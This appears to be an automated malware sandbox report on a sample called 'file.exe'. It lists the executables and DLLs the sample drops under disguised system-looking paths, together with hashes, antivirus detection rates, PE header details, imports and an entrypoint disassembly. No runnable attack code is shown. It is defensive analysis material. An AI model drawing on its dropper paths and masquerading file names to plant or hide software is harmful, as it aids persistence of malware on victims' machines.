File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\gRRDSLOb.log

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\gVlLDILN.log

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.535426842040921
Encrypted:	false
SSDEEP:	384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
MD5:	5420053AF2D273C456FB46C2CDD68F64
SHA1:	EA1808D7A8C401A68097353BB51A85F1225B429C
SHA-256:	A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
SHA-512:	DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kWdCPgQJ.log

Download File

Process:	C:\Recovery\DtJTopEKFGnyRQt.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	5.535426842040921
Encrypted:	false
SSDEEP:	384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
MD5:	5420053AF2D273C456FB46C2CDD68F64
SHA1:	EA1808D7A8C401A68097353BB51A85F1225B429C
SHA-256:	A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
SHA-512:	DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...a..e...........!.....X...........w... ........@.. ....................................@..................................v..W.................................................................................... ............... ..H............text...$W... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................w......H........Q..D%...........P........................................................................................................................................................................pw.&..l%\....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\oyuBnBbv.log

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	5.645950918301459
Encrypted:	false
SSDEEP:	384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
MD5:	E84DCD8370FAC91DE71DEF8DCF09BFEC
SHA1:	2E73453750A36FD3611D5007BBB26A39DDF5F190
SHA-256:	DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
SHA-512:	77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\xcCqXurc.log

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Windows\Media\Heritage\75cd070fe4800c

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	171
Entropy (8bit):	5.710601404155345
Encrypted:	false
SSDEEP:	3:5p/Sy8VwUSbMdI06GgMV+vREg0TRShic9o9/udsDcXn/0D5XExxgRaTVGLV6e0qg:5p5EwvOw3MMD0T0UglsDwWExGRqVu6eE
MD5:	2FD7CD514DD919A10BCA5A7DE80D271C
SHA1:	99EF64425B8516D3147F88E730C74A4869B7E37B
SHA-256:	DB72515BF5D5B517713E77654B7B211EF732A7D314BC961BBAE29B2BEA38D5AB
SHA-512:	B4ACA87334AAC046B99EC6B8717ABBAB8CA02DAC8DDE781FCF19603643689E3C6C1ED37A46B9B533F57C8611537717068478DAF08198766F5D2972883ABF5F82
Malicious:	false
Preview:	5Glm1IjUwWQCq0Uioy42vwMLZsFTiDn8Em9rir7K7wImpq3dEXQnpxYJ4aMICQvssR7D0m961u58njgszmOLxASRO0xIfyHrBa3XszmcYUw52afU3dTaBj4s8pzAy0bCnN6NpI99AwwdOXZyUdOBeqqbfLZD9lnh3tRodSoveUa

C:\Windows\Media\Heritage\DtJTopEKFGnyRQt.exe

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1978368
Entropy (8bit):	7.559518015543571
Encrypted:	false
SSDEEP:	24576:dTzktGDDycueG0kIz5uGigS9r0VxU5UNWL061SZDm9/CIBDwHfTvATErI:dEJculsz5u4SlYrWL06YZ+/DQvA4
MD5:	A961FFE1FAEECF8AD553D4792052498C
SHA1:	1A8DA2A519AC6D60A3AF0E7BEF9D210BF9F00625
SHA-256:	BF7C89BB02A84441CBF8A99D90D58203325AEB848CEA98A62DBE9A39BC61308F
SHA-512:	873BB592136978E3A6D514EB8DAE204E96F42C36BED28A274EF84666A0FC4D82A4F4DAD1119E3FA754C3E6E4EEAE8AC4040DD1BA3E3F6D5D9881CF2177F96C81
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................(...........G... ...`....@.. ....................................@.................................@G..K....`..p............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...p....`.....................@....reloc..............................@..B................pG......H.......L...<.......o........m...F.......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....8........0.......... ........8........E........P..._...............8....~....(G... .... .... ....s....~....(K....... ....~r...{....9....& ....8....8N... ....8....~....9.... ....~r...{....:f...& ....8[......... ....8K...r...ps....z*....~....(O...~....(S... ....?...

C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	55
Entropy (8bit):	4.306461250274409
Encrypted:	false
SSDEEP:	3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:	DCA83F08D448911A14C22EBCACC5AD57
SHA1:	91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

C:\Windows\Setup\State\75cd070fe4800c

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	ASCII text, with very long lines (526), with no line terminators
Category:	dropped
Size (bytes):	526
Entropy (8bit):	5.882182115045091
Encrypted:	false
SSDEEP:	12:5YcjgqtO600XShRGvHx3r9vxZ+ylkT8EjpKHRL+k0OU8dxHiZn:5DZU60TMnsylD+d4Wn
MD5:	C0DC2DA0EF62146BFA6D3601F6B08271
SHA1:	67A1ACE3F6772D1D53A56A5FD2EE5F2B33378049
SHA-256:	22A90A853981D0F97FC1E70223BF65650A184345D3BB1D9A4794E9C3C034E3A7
SHA-512:	26BE368ADE592AF7B73CDBE762EF1DE6CCE02A8404B0163AA93230A52CAABBA1D82FAF8593D6272EC0ED61A23FF4B9B5877B84A2F74C4ED3519915B6DA242F92
Malicious:	false
Preview:	5LMVaaNWHKIid6Fex7aaSlAevWvKY1vG0y4PYpwpnNlVy1hVLWlvyuOUKrkEoD7QYBsoCzGHLuxEAoq4ya9CP9SFkkFqFrAkQU7wI3TVQdkD7JTfApQOE4AYtnEbuZCduMypr4v5GnvvZPIbQjpZbwgVUiDfz1l0bHTuUnxG4UHaJO9eemLLtnB7qdVJ1PGPC5US6YGmvjfHoFLGiiAMqZGxFVD0SoOoO2XN3qiGgiZKI4TkROkSO3jmyhMkUPTHU02ws8M1A4qHA6pLCcjDD6ZUTuZWd7wQOSzRCh2TCsRUNbm21Bi1qPDYbhc7i0XDIZ2sGXJekPBUpEH1IgebY4j9Ob0eE4uLUOMxj4ve2DRbOstWalzCW6oO03dphoaqez9b2TRNuAjVmIvfseDdEszYj87qbG7Onl6YtRdHTmRWWTlrH77Dl7lw9k14WlwoCUrBMWwaA6JcadBQXPieJ3nq9JYIajvsznTClkfuKgCoxJWgilhGCSeJrBBC8o9aLbnwK9oxtxTm18

C:\Windows\Setup\State\DtJTopEKFGnyRQt.exe

Download File

Process:	C:\MsContainer\chainportruntimeCrtMonitor.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1978368
Entropy (8bit):	7.559518015543571
Encrypted:	false
SSDEEP:	24576:dTzktGDDycueG0kIz5uGigS9r0VxU5UNWL061SZDm9/CIBDwHfTvATErI:dEJculsz5u4SlYrWL06YZ+/DQvA4
MD5:	A961FFE1FAEECF8AD553D4792052498C
SHA1:	1A8DA2A519AC6D60A3AF0E7BEF9D210BF9F00625
SHA-256:	BF7C89BB02A84441CBF8A99D90D58203325AEB848CEA98A62DBE9A39BC61308F
SHA-512:	873BB592136978E3A6D514EB8DAE204E96F42C36BED28A274EF84666A0FC4D82A4F4DAD1119E3FA754C3E6E4EEAE8AC4040DD1BA3E3F6D5D9881CF2177F96C81
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.................(...........G... ...`....@.. ....................................@.................................@G..K....`..p............................................................................ ............... ..H............text....'... ...(.................. ..`.rsrc...p....`.....................@....reloc..............................@..B................pG......H.......L...<.......o........m...F.......................................0..........(.... ........8........E....N.......M...)...8I...(.... ....~r...{....:....& ....8....(.... ....~r...{....9....& ....8....(.... ....8........0.......... ........8........E........P..._...............8....~....(G... .... .... ....s....~....(K....... ....~r...{....9....& ....8....8N... ....8....~....9.... ....~r...{....:f...& ....8[......... ....8K...r...ps....z*....~....(O...~....(S... ....?...

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	502
Entropy (8bit):	4.622527548334437
Encrypted:	false
SSDEEP:	12:P85pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:2dUOAokItULVDv
MD5:	75A3A4796808514607646A895EF7FDA0
SHA1:	EAC0BAE94723B57E5E279FA9FC067AAA76F6B330
SHA-256:	4A365D854B70AADECC496EE029537E803F31A031D6C9346F2D54BD1E0BA46A01
SHA-512:	67A57F2FF2DE71E19D706816ABE869B84B31C1F42923A7EFDFB1B17D3526F5E6F6B1CC03FD8CB8AE6B9021E6C3365B6751466B0B86A1F5BCEFF7EFF1B9EC3973
Malicious:	false
Preview:	..Pinging 445817 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.49626931384866
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	2'300'139 bytes
MD5:	10f971c35d66a56bff28e89b8f97b849
SHA1:	f504ffe66a8bf9725af6c5aed8cb0358dfc460b1
SHA256:	8b73a27cf75cda6f4196d1b9491e90209c73171098c02ffc4753ae729fd557ec
SHA512:	968f3202b17db448a4cc92aedb9d26f7c3aba0b6dc264f187b65f9e0b1144c1d806f3790d5d7bdecb01f9ef3d55eedb2497344f3c858b3149b5a4663b3c6da4d
SSDEEP:	24576:2TbBv5rUyXVNTzktGDDycueG0kIz5uGigS9r0VxU5UNWL061SZDm9/CIBDwHfTv4:IBJNEJculsz5u4SlYrWL06YZ+/DQvA4Q
TLSH:	78B5BF17A9924E33C2943F32C8DB183D53B0D6657622EF0B3B1E19D5ED16261AF172B2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007FE594F352EBh
jmp 00007FE594F34BFDh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FE594F27A47h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007FE594F3808Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007FE594F34D8Ch
push 0000000Ch
push esi
call 00007FE594F34349h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FE594F279C2h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FE594F37B49h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007FE594F34D08h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007FE594F37B2Ch
int3
jmp 00007FE594F395C7h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
